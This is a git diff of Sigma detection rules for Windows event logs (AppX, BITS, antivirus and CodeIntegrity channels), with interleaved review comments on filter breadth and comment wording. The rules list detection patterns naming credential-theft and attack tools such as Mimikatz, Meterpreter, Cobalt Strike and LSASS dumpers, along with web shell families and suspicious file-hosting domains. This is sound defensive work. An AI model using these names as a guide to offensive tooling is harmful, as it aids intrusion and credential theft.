diff --git a/sigma/builtin/appxdeployment_server/win_appxdeployment_server_susp_domains.yml b/sigma/builtin/appxdeployment_server/win_appxdeployment_server_susp_domains.yml
index 0f26b76b9..c43119920 100644
--- a/sigma/builtin/appxdeployment_server/win_appxdeployment_server_susp_domains.yml
+++ b/sigma/builtin/appxdeployment_server/win_appxdeployment_server_susp_domains.yml
@@ -1,8 +1,7 @@
 title: Suspicious Remote AppX Package Locations
 id: 8b48ad89-10d8-4382-a546-50588c410f0d
 status: experimental
-description: Detects an appx package added the pipeline of the "to be processed" packages
- which is downloaded from a suspicious domain
+description: Detects an appx package added the pipeline of the "to be processed" packages which is downloaded from a suspicious domain
 references:
 - Internal Research
 - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/
@@ -22,7 +21,7 @@ detection:
 selection:
 EventID: 854
 Path|contains:
- - .githubusercontent.com
+ - .githubusercontent.com # Includes both gists and github repositories / Michael Haag (idea)
 - anonfiles.com
 - cdn.discordapp.com
 - cdn.discordapp.com/attachments/
diff --git a/sigma/builtin/appxdeployment_server/win_appxdeployment_server_susp_package_locations.yml b/sigma/builtin/appxdeployment_server/win_appxdeployment_server_susp_package_locations.yml
index 52419b27c..9e2770315 100644
--- a/sigma/builtin/appxdeployment_server/win_appxdeployment_server_susp_package_locations.yml
+++ b/sigma/builtin/appxdeployment_server/win_appxdeployment_server_susp_package_locations.yml
@@ -1,8 +1,7 @@ title: Suspicious AppX Package Locations id: 5cdeaf3d-1489-477c-95ab-c318559fc051 status: test -description: Detects an appx package added the pipeline of the "to be processed" packages - which is located in suspicious locations +description: Detects an appx package added the pipeline of the "to be processed" packages which is located in suspicious locations references: - Internal Research - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/ @@ -21,6 +20,7 @@ detection: selection: EventID: 854 Path|contains: + # Paths can be written using forward slash if the "file://" protocol is used - C:\Users\Public\ - /users/public/ - C:\PerfLogs\ diff --git a/sigma/builtin/appxdeployment_server/win_appxdeployment_server_uncommon_package_locations.yml b/sigma/builtin/appxdeployment_server/win_appxdeployment_server_uncommon_package_locations.yml index 988a135fd..ee7ec5baa 100644 --- a/sigma/builtin/appxdeployment_server/win_appxdeployment_server_uncommon_package_locations.yml +++ b/sigma/builtin/appxdeployment_server/win_appxdeployment_server_uncommon_package_locations.yml @@ -1,8 +1,7 @@ title: Uncommon AppX Package Locations id: c977cb50-3dff-4a9f-b873-9290f56132f1 status: test -description: Detects an appx package added the pipeline of the "to be processed" packages - which is located in uncommon locations +description: Detects an appx package added the pipeline of the "to be processed" packages which is located in uncommon locations references: - Internal Research - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/ 
@@ -22,17 +21,18 @@ detection: EventID: 854 filter_generic: Path|contains: + # Paths can be written using forward slash if the "file://" protocol is used - C:\Program Files\WindowsApps\ - C:\Program Files (x86)\ - C:\Windows\SystemApps\ - C:\Windows\PrintDialog\ - C:\Windows\ImmersiveControlPanel\ - x-windowsupdate:// - - file:///C:/Program%20Files + - file:///C:/Program%20Files # Also covers 'file:///C:/Program%20Files%20(x86)/' filter_specific: Path|contains: - https://statics.teams.cdn.office.net/ - - microsoft.com + - microsoft.com # Example: https://go.microsoft.com/fwlink/?linkid=2160968 condition: appxdeployment_server and (selection and not 1 of filter_*) falsepositives: - Unknown diff --git a/sigma/builtin/appxpackaging_om/win_appxpackaging_om_sups_appx_signature.yml b/sigma/builtin/appxpackaging_om/win_appxpackaging_om_sups_appx_signature.yml index 57ddd7eda..88a35c0f0 100644 --- a/sigma/builtin/appxpackaging_om/win_appxpackaging_om_sups_appx_signature.yml +++ b/sigma/builtin/appxpackaging_om/win_appxpackaging_om_sups_appx_signature.yml @@ -1,8 +1,7 @@ title: Suspicious Digital Signature Of AppX Package id: b5aa7d60-c17e-4538-97de-09029d6cd76b status: test -description: Detects execution of AppX packages with known suspicious or malicious - signature +description: Detects execution of AppX packages with known suspicious or malicious signature references: - Internal Research - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/ 
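Review bot: `filter_specific` in win_appxdeployment_server_uncommon_package_locations.yml excludes any event whose Path merely contains `microsoft.com`, which is much wider than the `https://go.microsoft.com/fwlink/?linkid=2160968` example the new comment gives — with `|contains` the substring can sit anywhere in the URL or path, not only in the host. Anchoring the entry to the host as the comment documents, e.g. `- https://go.microsoft.com/` (plus whatever other Microsoft hosts your baseline shows), keeps the exclusion to what is actually intended. The forward-slash comment added to `filter_generic` is accurate for the `file:///C:/Program%20Files` entry, but the other backslash paths in that filter have no `file://` counterpart, so the same locations written in that form would not be filtered and would alert.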
@@ -19,9 +18,8 @@ detection: Channel: Microsoft-Windows-AppxPackaging/Operational selection: EventID: 157 - subjectName: CN=Foresee Consulting Inc., O=Foresee Consulting Inc., L=North - York, S=Ontario, C=CA, SERIALNUMBER=1004913-1, OID.1.3.6.1.4.1.311.60.2.1.3=CA, - OID.2.5.4.15=Private Organization + # Add more known suspicious/malicious certificates used in different attacks + subjectName: CN=Foresee Consulting Inc., O=Foresee Consulting Inc., L=North York, S=Ontario, C=CA, SERIALNUMBER=1004913-1, OID.1.3.6.1.4.1.311.60.2.1.3=CA, OID.2.5.4.15=Private Organization condition: appxpackaging_om and selection falsepositives: - Unknown diff --git a/sigma/builtin/bits_client/win_bits_client_new_job_via_bitsadmin.yml b/sigma/builtin/bits_client/win_bits_client_new_job_via_bitsadmin.yml index 915f06d18..8111d31e2 100644 --- a/sigma/builtin/bits_client/win_bits_client_new_job_via_bitsadmin.yml +++ b/sigma/builtin/bits_client/win_bits_client_new_job_via_bitsadmin.yml @@ -22,7 +22,6 @@ detection: processPath|endswith: \bitsadmin.exe condition: bits_client and selection falsepositives: - - Many legitimate applications or scripts could leverage "bitsadmin". This event - is best correlated with EID 16403 via the JobID field + - Many legitimate applications or scripts could leverage "bitsadmin". This event is best correlated with EID 16403 via the JobID field level: low ruletype: Sigma diff --git a/sigma/builtin/bits_client/win_bits_client_new_transfer_saving_susp_extensions.yml b/sigma/builtin/bits_client/win_bits_client_new_transfer_saving_susp_extensions.yml index 3196dcf29..fa21ec421 100644 --- a/sigma/builtin/bits_client/win_bits_client_new_transfer_saving_susp_extensions.yml +++ b/sigma/builtin/bits_client/win_bits_client_new_transfer_saving_susp_extensions.yml 
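Review bot: The joined `subjectName:` value in win_appxpackaging_om_sups_appx_signature.yml is an exact match on the whole distinguished name, so any difference in attribute order or spacing in how the 157 event renders the subject would miss it, and the new `# Add more known suspicious/malicious certificates` comment sits above a scalar key, so the next entry requires converting it to a list first. Consider `subjectName|contains:` with a list whose first item is `CN=Foresee Consulting Inc., O=Foresee Consulting Inc.`, checked against an actual event — this still matches the current value and makes the list extensible; hedged, since the exact rendering the log uses is not visible here.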
@@ -1,8 +1,7 @@ title: BITS Transfer Job Downloading File Potential Suspicious Extension id: b85e5894-9b19-4d86-8c87-a2f3b81f0521 status: experimental -description: Detects new BITS transfer job saving local files with potential suspicious - extensions +description: Detects new BITS transfer job saving local files with potential suspicious extensions references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md author: frack113 @@ -21,9 +20,10 @@ detection: selection: EventID: 16403 LocalName|endswith: + # TODO: Extend this list with more interesting file extensions - .bat - .dll - - .exe + - .exe # TODO: Might wanna comment this if it generates tons of FPs - .hta - .ps1 - .psd1 @@ -31,11 +31,11 @@ detection: - .vbe - .vbs filter_optional_generic: + # Typical updates: Chrome, Dropbox etc. LocalName|contains: \AppData\ RemoteName|contains: .com condition: bits_client and (selection and not 1 of filter_optional_*) falsepositives: - - While the file extensions in question can be suspicious at times. It's best - to add filters according to your environment to avoid large amount false positives + - While the file extensions in question can be suspicious at times. It's best to add filters according to your environment to avoid large amount false positives level: medium ruletype: Sigma diff --git a/sigma/builtin/bits_client/win_bits_client_new_transfer_via_file_sharing_domains.yml b/sigma/builtin/bits_client/win_bits_client_new_transfer_via_file_sharing_domains.yml index 300977f74..1a7525653 100644 --- a/sigma/builtin/bits_client/win_bits_client_new_transfer_via_file_sharing_domains.yml +++ b/sigma/builtin/bits_client/win_bits_client_new_transfer_via_file_sharing_domains.yml 
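Review bot: The new `# Typical updates: Chrome, Dropbox etc.` comment describes `filter_optional_generic` in win_bits_client_new_transfer_saving_susp_extensions.yml as an updater exception, but the filter itself (`LocalName|contains: \AppData\` together with `RemoteName|contains: .com`) exempts every `.com`-hosted download saved anywhere under AppData, which is a large share of what the rule would otherwise see, so the comment understates the exclusion. Narrowing `RemoteName` to the update hosts the comment names — or at least stating in the comment that the filter is deliberately broad and therefore `optional` — would make the trade-off visible to whoever enables it. The `# TODO: Might wanna comment this if it generates tons of FPs` on `.exe` reads as working notes; `# high-volume extension, see filter_optional_generic` would say the same thing more usefully.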
@@ -22,7 +22,7 @@ detection: selection: EventID: 16403 RemoteName|contains: - - .githubusercontent.com + - .githubusercontent.com # Includes both gists and github repositories / Michael Haag (idea) - anonfiles.com - cdn.discordapp.com - cdn.discordapp.com/attachments/ diff --git a/sigma/builtin/bits_client/win_bits_client_new_transfer_via_ip_address.yml b/sigma/builtin/bits_client/win_bits_client_new_transfer_via_ip_address.yml index 58a073376..084075335 100644 --- a/sigma/builtin/bits_client/win_bits_client_new_transfer_via_ip_address.yml +++ b/sigma/builtin/bits_client/win_bits_client_new_transfer_via_ip_address.yml @@ -1,8 +1,8 @@ title: BITS Transfer Job Download From Direct IP id: 90f138c1-f578-4ac3-8c49-eecfd847c8b7 related: - - id: 99c840f2-2012-46fd-9141-c761987550ef - type: similar + - id: 99c840f2-2012-46fd-9141-c761987550ef + type: similar status: experimental description: Detects a BITS transfer job downloading file(s) from a direct IP address. references: @@ -46,9 +46,9 @@ detection: - https://9 filter_optional_local_networks: RemoteName|contains: - - ://10. - - ://192.168. - - ://172.16. + - ://10. # 10.0.0.0/8 + - ://192.168. # 192.168.0.0/16 + - ://172.16. # 172.16.0.0/12 - ://172.17. - ://172.18. - ://172.19. @@ -64,10 +64,11 @@ detection: - ://172.29. - ://172.30. - ://172.31. - - ://127. - - ://169.254. + - ://127. # 127.0.0.0/8 + - ://169.254. # 169.254.0.0/16 filter_optional_seven_zip: RemoteName|contains: + # For https://7-zip.org/ - https://7- - http://7- condition: bits_client and (selection and not 1 of filter_optional_*) diff --git a/sigma/builtin/bits_client/win_bits_client_new_transfer_via_uncommon_tld.yml b/sigma/builtin/bits_client/win_bits_client_new_transfer_via_uncommon_tld.yml index b295a566b..7796f954c 100644 --- a/sigma/builtin/bits_client/win_bits_client_new_transfer_via_uncommon_tld.yml +++ b/sigma/builtin/bits_client/win_bits_client_new_transfer_via_uncommon_tld.yml 
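Review bot: The `# For https://7-zip.org/` comment on `filter_optional_seven_zip` in win_bits_client_new_transfer_via_ip_address.yml documents the exception but not why it exists: the visible `- https://9` entry suggests the selection matches any RemoteName whose host begins with a digit, not only literal IP addresses, which is why a hostname like 7-zip.org needs filtering at all. That limitation belongs in a comment on the selection itself (which starts outside this hunk), e.g. `# Note: matches any host starting with a digit, not only IPs; see filter_optional_seven_zip`, so readers know further hostname exceptions may be required. The private-range comments added here (`# 10.0.0.0/8`, `# 172.16.0.0/12` and so on) are accurate for the entries they annotate.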
@@ -1,9 +1,7 @@ title: BITS Transfer Job With Uncommon Or Suspicious Remote TLD id: 6d44fb93-e7d2-475c-9d3d-54c9c1e33427 status: experimental -description: Detects a suspicious download using the BITS client from a FQDN that - is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up - after malicious payloads. +description: Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md - https://twitter.com/malmoeb/status/1535142803075960832 @@ -27,11 +25,9 @@ detection: - .azureedge.net/ - .com/ - .sfx.ms/ - - download.mozilla.org/ + - download.mozilla.org/ # https://download.mozilla.org/?product=firefox-101.0.1-partial-101.0&os=win64&lang=en-US condition: bits_client and (selection and not 1 of filter_main_*) falsepositives: - - This rule doesn't exclude other known TLDs such as ".org" or ".net". It's recommended - to apply additional filters for software and scripts that leverage the BITS - service + - This rule doesn't exclude other known TLDs such as ".org" or ".net". It's recommended to apply additional filters for software and scripts that leverage the BITS service level: medium ruletype: Sigma diff --git a/sigma/builtin/bits_client/win_bits_client_new_trasnfer_susp_local_folder.yml b/sigma/builtin/bits_client/win_bits_client_new_trasnfer_susp_local_folder.yml index d7f010724..f96ad5b9f 100644 --- a/sigma/builtin/bits_client/win_bits_client_new_trasnfer_susp_local_folder.yml +++ b/sigma/builtin/bits_client/win_bits_client_new_trasnfer_susp_local_folder.yml 
@@ -1,8 +1,7 @@ title: BITS Transfer Job Download To Potential Suspicious Folder id: f8a56cb7-a363-44ed-a82f-5926bb44cd05 status: experimental -description: Detects new BITS transfer job where the LocalName/Saved file is stored - in a potentially suspicious location +description: Detects new BITS transfer job where the LocalName/Saved file is stored in a potentially suspicious location references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md author: Florian Roth (Nextron Systems) @@ -21,6 +20,7 @@ detection: selection: EventID: 16403 LocalName|contains: + # TODO: Add more interesting suspicious paths - \Desktop\ - C:\Users\Public\ - C:\PerfLogs\ diff --git a/sigma/builtin/capi2/win_capi2_acquire_certificate_private_key.yml b/sigma/builtin/capi2/win_capi2_acquire_certificate_private_key.yml index e8bd68c49..d61e45198 100644 --- a/sigma/builtin/capi2/win_capi2_acquire_certificate_private_key.yml +++ b/sigma/builtin/capi2/win_capi2_acquire_certificate_private_key.yml @@ -17,10 +17,9 @@ detection: capi2: Channel: Microsoft-Windows-CAPI2/Operational selection: - EventID: 70 + EventID: 70 # Acquire Certificate Private Key condition: capi2 and selection falsepositives: - - Legitimate application requesting certificate exports will trigger this. Apply - additional filters as needed + - Legitimate application requesting certificate exports will trigger this. Apply additional filters as needed level: medium ruletype: Sigma diff --git a/sigma/builtin/category/antivirus/av_exploiting.yml b/sigma/builtin/category/antivirus/av_exploiting.yml index 1abff9da4..3ac97d0b9 100644 --- a/sigma/builtin/category/antivirus/av_exploiting.yml +++ b/sigma/builtin/category/antivirus/av_exploiting.yml 
@@ -1,8 +1,7 @@ title: Antivirus Exploitation Framework Detection id: 238527ad-3c2c-4e4f-a1f6-92fd63adb864 status: stable -description: Detects a highly relevant Antivirus alert that reports an exploitation - framework +description: Detects a highly relevant Antivirus alert that reports an exploitation framework references: - https://www.nextron-systems.com/?s=antivirus - https://www.virustotal.com/gui/file/925b0b28472d4d79b4bf92050e38cc2b8f722691c713fc28743ac38551bc3797 @@ -22,7 +21,7 @@ logsource: service: windefend detection: antivirus: - EventID: + EventID: # https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus IDs with existing 'Threat Name' or 'Path' - 1006 - 1007 - 1008 diff --git a/sigma/builtin/category/antivirus/av_hacktool.yml b/sigma/builtin/category/antivirus/av_hacktool.yml index 981daeb5c..15567e5d0 100644 --- a/sigma/builtin/category/antivirus/av_hacktool.yml +++ b/sigma/builtin/category/antivirus/av_hacktool.yml @@ -1,8 +1,7 @@ title: Antivirus Hacktool Detection id: fa0c05b6-8ad3-468d-8231-c1cbccb64fba status: stable -description: Detects a highly relevant Antivirus alert that reports a hack tool or - other attack tool +description: Detects a highly relevant Antivirus alert that reports a hack tool or other attack tool references: - https://www.nextron-systems.com/2021/08/16/antivirus-event-analysis-cheat-sheet-v1-8-2/ - https://www.nextron-systems.com/?s=antivirus @@ -18,7 +17,7 @@ logsource: service: windefend detection: antivirus: - EventID: + EventID: # https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus IDs with existing 'Threat Name' or 'Path' - 1006 - 1007 - 1008 
@@ -35,50 +34,51 @@ detection: - 1116 Channel: Microsoft-Windows-Windows Defender/Operational selection: - - ThreatName|startswith: - - HTOOL - - HKTL - - SecurityTool - - Adfind - - ATK/ - - Exploit.Script.CVE - - PWS. - - PWSX - - ThreatName|contains: - - Hacktool - - ATK/ - - Potato - - Rozena - - Sbelt - - Seatbelt - - SecurityTool - - SharpDump - - Sliver - - Splinter - - Swrort - - Impacket - - Koadic - - Lazagne - - Metasploit - - Meterpreter - - MeteTool - - Mimikatz - - Mpreter - - Nighthawk - - PentestPowerShell - - PowerSploit - - PowerSSH - - PshlSpy - - PSWTool - - PWCrack - - Brutel - - BruteR - - Cobalt - - COBEACON - - Cometer - - DumpCreds - - FastReverseProxy - - PWDump + - ThreatName|startswith: + - HTOOL + - HKTL + - SecurityTool + - Adfind + - ATK/ + - Exploit.Script.CVE + # - 'FRP.' + - PWS. + - PWSX + - ThreatName|contains: + - Hacktool + - ATK/ # Sophos + - Potato + - Rozena + - Sbelt + - Seatbelt + - SecurityTool + - SharpDump + - Sliver + - Splinter + - Swrort + - Impacket + - Koadic + - Lazagne + - Metasploit + - Meterpreter + - MeteTool + - Mimikatz + - Mpreter + - Nighthawk + - PentestPowerShell + - PowerSploit + - PowerSSH + - PshlSpy + - PSWTool + - PWCrack + - Brutel + - BruteR + - Cobalt + - COBEACON + - Cometer + - DumpCreds + - FastReverseProxy + - PWDump condition: antivirus and selection falsepositives: - Unlikely diff --git a/sigma/builtin/category/antivirus/av_password_dumper.yml b/sigma/builtin/category/antivirus/av_password_dumper.yml index e704e4769..401b08f6b 100644 --- a/sigma/builtin/category/antivirus/av_password_dumper.yml +++ b/sigma/builtin/category/antivirus/av_password_dumper.yml @@ -21,7 +21,7 @@ logsource: service: windefend detection: antivirus: - EventID: + EventID: # https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus IDs with existing 'Threat Name' or 'Path' - 1006 - 1007 - 1008 
@@ -38,24 +38,24 @@ detection: - 1116 Channel: Microsoft-Windows-Windows Defender/Operational selection: - - ThreatName|startswith: PWS - - ThreatName|contains: - - DumpCreds - - Mimikatz - - PWCrack - - HTool/WCE - - PSWTool - - PWDump - - SecurityTool - - PShlSpy - - Rubeus - - Kekeo - - LsassDump - - Outflank - - DumpLsass - - SharpDump - - PWSX - - PWS. + - ThreatName|startswith: PWS + - ThreatName|contains: + - DumpCreds + - Mimikatz + - PWCrack + - HTool/WCE + - PSWTool + - PWDump + - SecurityTool + - PShlSpy + - Rubeus + - Kekeo + - LsassDump + - Outflank + - DumpLsass + - SharpDump + - PWSX + - PWS. condition: antivirus and selection falsepositives: - Unlikely diff --git a/sigma/builtin/category/antivirus/av_ransomware.yml b/sigma/builtin/category/antivirus/av_ransomware.yml index 12fe2ed3d..044ed3c27 100644 --- a/sigma/builtin/category/antivirus/av_ransomware.yml +++ b/sigma/builtin/category/antivirus/av_ransomware.yml @@ -20,7 +20,7 @@ logsource: service: windefend detection: antivirus: - EventID: + EventID: # https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus IDs with existing 'Threat Name' or 'Path' - 1006 - 1007 - 1008 diff --git a/sigma/builtin/category/antivirus/av_relevant_files.yml b/sigma/builtin/category/antivirus/av_relevant_files.yml index 0b04dd5fe..cab783e17 100644 --- a/sigma/builtin/category/antivirus/av_relevant_files.yml +++ b/sigma/builtin/category/antivirus/av_relevant_files.yml @@ -1,8 +1,7 @@ title: Antivirus Relevant File Paths Alerts id: c9a88268-0047-4824-ba6e-4d81ce0b907c status: test -description: Detects an Antivirus alert in a highly relevant file path or with a relevant - file name +description: Detects an Antivirus alert in a highly relevant file path or with a relevant file name references: - https://www.nextron-systems.com/?s=antivirus author: Florian Roth (Nextron Systems), Arnim Rupp 
@@ -17,7 +16,7 @@ logsource: service: windefend detection: antivirus: - EventID: + EventID: # https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus IDs with existing 'Threat Name' or 'Path' - 1006 - 1007 - 1008 @@ -35,11 +34,13 @@ detection: Channel: Microsoft-Windows-Windows Defender/Operational selection_path: Path|contains: + # could be startswith, if there is a better backend handling - :\Windows\ - :\Temp\ - :\PerfLogs\ - :\Users\Public\ - :\Users\Default\ + # true 'contains' matches: - \Client\ - \tsclient\ - \inetpub\ diff --git a/sigma/builtin/category/antivirus/av_webshell.yml b/sigma/builtin/category/antivirus/av_webshell.yml index f7388a5a9..94ea3ca22 100644 --- a/sigma/builtin/category/antivirus/av_webshell.yml +++ b/sigma/builtin/category/antivirus/av_webshell.yml @@ -1,10 +1,7 @@ title: Antivirus Web Shell Detection id: fdf135a2-9241-4f96-a114-bb404948f736 status: test -description: Detects a highly relevant Antivirus alert that reports a web shell. It's - highly recommended to tune this rule to the specific strings used by your anti - virus solution by downloading a big webshell repo from e.g. github and checking - the matches. +description: Detects a highly relevant Antivirus alert that reports a web shell. It's highly recommended to tune this rule to the specific strings used by your anti virus solution by downloading a big webshell repo from e.g. github and checking the matches. references: - https://www.nextron-systems.com/?s=antivirus - https://github.com/tennc/webshell @@ -28,7 +25,7 @@ logsource: service: windefend detection: antivirus: - EventID: + EventID: # https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus IDs with existing 'Threat Name' or 'Path' - 1006 - 1007 - 1008 
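Review bot: The new comment `# could be startswith, if there is a better backend handling` above `:\Windows\` in the `@@ -35,11 +34,13 @@` hunk of av_relevant_files.yml is easy to misread, because a plain `startswith` would never match these values — the real path begins with a drive letter, which is exactly why they are anchored on `:\` and used with `contains`. A wording such as `# anchored on ':\' so 'contains' matches any drive letter; a drive-agnostic prefix match would need wildcard support in the backend` states the intent directly. The `selection_path` list appears to continue past the hunk.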
@@ -45,60 +42,60 @@ detection: - 1116 Channel: Microsoft-Windows-Windows Defender/Operational selection: - - ThreatName|startswith: - - PHP. - - JSP. - - ASP. - - Perl. - - VBS/Uxor - - IIS/BackDoor - - JAVA/Backdoor - - Troj/ASP - - Troj/PHP - - Troj/JSP - - ThreatName|contains: - - Webshell - - Chopper - - SinoChoper - - ASPXSpy - - Aspdoor - - filebrowser - - PHP_ - - JSP_ - - ASP_ - - 'PHP:' - - 'JSP:' - - 'ASP:' - - 'Perl:' - - PHP/ - - JSP/ - - ASP/ - - Perl/ - - PHPShell - - Trojan.PHP - - Trojan.ASP - - Trojan.JSP - - Trojan.VBS - - PHP/Agent - - ASP/Agent - - JSP/Agent - - VBS/Agent - - Backdoor/PHP - - Backdoor/JSP - - Backdoor/ASP - - Backdoor/VBS - - Backdoor/Java - - PHP.Agent - - ASP.Agent - - JSP.Agent - - VBS.Agent - - Backdoor.PHP - - Backdoor.JSP - - Backdoor.ASP - - Backdoor.VBS - - Backdoor.Java - - PShlSpy - - C99shell + - ThreatName|startswith: + - PHP. + - JSP. + - ASP. + - Perl. + - VBS/Uxor # looking for 'VBS/' would also find downloaders and droppers meant for desktops + - IIS/BackDoor + - JAVA/Backdoor + - Troj/ASP + - Troj/PHP + - Troj/JSP + - ThreatName|contains: + - Webshell + - Chopper + - SinoChoper + - ASPXSpy + - Aspdoor + - filebrowser + - PHP_ + - JSP_ + - ASP_ # looking for 'VBS_' would also find downloaders and droppers meant for desktops + - 'PHP:' + - 'JSP:' + - 'ASP:' + - 'Perl:' + - PHP/ + - JSP/ + - ASP/ + - Perl/ + - PHPShell + - Trojan.PHP + - Trojan.ASP + - Trojan.JSP + - Trojan.VBS + - PHP/Agent + - ASP/Agent + - JSP/Agent + - VBS/Agent + - Backdoor/PHP + - Backdoor/JSP + - Backdoor/ASP + - Backdoor/VBS + - Backdoor/Java + - PHP.Agent + - ASP.Agent + - JSP.Agent + - VBS.Agent + - Backdoor.PHP + - Backdoor.JSP + - Backdoor.ASP + - Backdoor.VBS + - Backdoor.Java + - PShlSpy + - C99shell condition: antivirus and selection falsepositives: - Unlikely 
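Review bot: The comment appended to the `ASP_` entry of `ThreatName|contains` (`# looking for 'VBS_' would also find downloaders and droppers meant for desktops`) explains why there is no `VBS_` entry, but attached to the `ASP_` line it reads as a remark about `ASP_`. Placing it on its own line after `ASP_`, e.g. `# 'VBS_' intentionally omitted: it would also match downloaders and droppers meant for desktops`, mirrors the `VBS/Uxor` comment in the `startswith` list and removes the ambiguity.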
diff --git a/sigma/builtin/certificate_services_client_lifecycle_system/win_certificateservicesclient_lifecycle_system_cert_exported.yml b/sigma/builtin/certificate_services_client_lifecycle_system/win_certificateservicesclient_lifecycle_system_cert_exported.yml index 3251ed5a7..037d75920 100644 --- a/sigma/builtin/certificate_services_client_lifecycle_system/win_certificateservicesclient_lifecycle_system_cert_exported.yml +++ b/sigma/builtin/certificate_services_client_lifecycle_system/win_certificateservicesclient_lifecycle_system_cert_exported.yml @@ -1,8 +1,7 @@ title: Certificate Exported From Local Certificate Store id: 58c0bff0-40a0-46e8-b5e8-b734b84d2017 status: experimental -description: Detects when an application exports a certificate (and potentially the - private key as well) from the local Windows certificate store. +description: Detects when an application exports a certificate (and potentially the private key as well) from the local Windows certificate store. references: - https://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html author: Zach Mathis @@ -17,10 +16,9 @@ detection: certificateservicesclient_lifecycle_system: Channel: Microsoft-Windows-CertificateServicesClient-Lifecycle-System/Operational selection: - EventID: 1007 + EventID: 1007 # A certificate has been exported condition: certificateservicesclient_lifecycle_system and selection falsepositives: - - Legitimate application requesting certificate exports will trigger this. Apply - additional filters as needed + - Legitimate application requesting certificate exports will trigger this. Apply additional filters as needed level: medium ruletype: Sigma diff --git a/sigma/builtin/code_integrity/win_codeintegrity_attempted_dll_load.yml b/sigma/builtin/code_integrity/win_codeintegrity_attempted_dll_load.yml index ed13822b9..1f6c76eb0 100644 --- a/sigma/builtin/code_integrity/win_codeintegrity_attempted_dll_load.yml 
+++ b/sigma/builtin/code_integrity/win_codeintegrity_attempted_dll_load.yml @@ -1,13 +1,9 @@ title: CodeIntegrity - Unmet Signing Level Requirements By File Under Validation id: f8931561-97f5-4c46-907f-0a4a592e47a7 status: experimental -description: 'Detects attempted file load events that did not meet the signing level - requirements. It often means the file''s signature is revoked or a signature with - the Lifetime Signing EKU has expired. - +description: | + Detects attempted file load events that did not meet the signing level requirements. It often means the file's signature is revoked or a signature with the Lifetime Signing EKU has expired. This event is best correlated with EID 3089 to determine the error of the validation. - - ' references: - https://twitter.com/SBousseaden/status/1483810148602814466 - https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log 
@@ -26,17 +22,21 @@ detection: Channel: Microsoft-Windows-CodeIntegrity/Operational selection: EventID: - - 3033 - - 3034 + - 3033 # Code Integrity determined that a process (%4) attempted to load %2 that did not meet the %5 signing level requirements. + - 3034 # Code Integrity determined that a process (%4) attempted to load %2 that did not meet the %5 signing level requirements or violated code integrity policy. However, due to code integrity auditing policy, the image was allowed to load. filter_optional_dtrace: + # Example: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files\DTrace\dtrace.dll that did not meet the Windows signing level requirements. FileNameBuffer|endswith: \Program Files\DTrace\dtrace.dll ProcessNameBuffer|endswith: \Windows\System32\svchost.exe RequestedPolicy: 12 filter_optional_av_generic: + # Example: Code Integrity determined that a process (\Device\HarddiskVolume5\ProgramData\Microsoft\Windows Defender\Platform\4.18.2207.7-0\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_36fb67bd6dbd887d\igd10iumd64.dll that did not meet the Custom 3 / Antimalware signing level requirements. FileNameBuffer|contains: \Windows\System32\DriverStore\FileRepository\ FileNameBuffer|endswith: \igd10iumd64.dll + # ProcessNameBuffer is AV products RequestedPolicy: 7 filter_optional_electron_based_app: + # Example: Code Integrity determined that a process (\Device\HarddiskVolume5\Users\user\AppData\Local\Keybase\Gui\Keybase.exe) attempted to load \Device\HarddiskVolume5\Windows\System32\nvspcap64.dll that did not meet the Microsoft signing level requirements. FileNameBuffer|endswith: \Windows\System32\nvspcap64.dll ProcessNameBuffer|endswith: - \AppData\Local\Keybase\Gui\Keybase.exe 
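Review bot: The added comment `# ProcessNameBuffer is AV products` under `filter_optional_av_generic` documents a constraint the filter does not apply: it matches only `FileNameBuffer` and `RequestedPolicy: 7`, so any process loading `igd10iumd64.dll` from the DriverStore at that policy is excluded, not just AV engines. Either reword it to say the process is deliberately unconstrained, e.g. `# ProcessNameBuffer intentionally not filtered: observed loaders are AV engines (see example) but vary by product`, or add a `ProcessNameBuffer|endswith` list of the engines actually observed so the exclusion stays narrow. The same comment sits on `filter_optional_msoffice` in the `@@ -51,16 +51,19 @@` hunk with the same gap. The `detection` block continues past this hunk.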
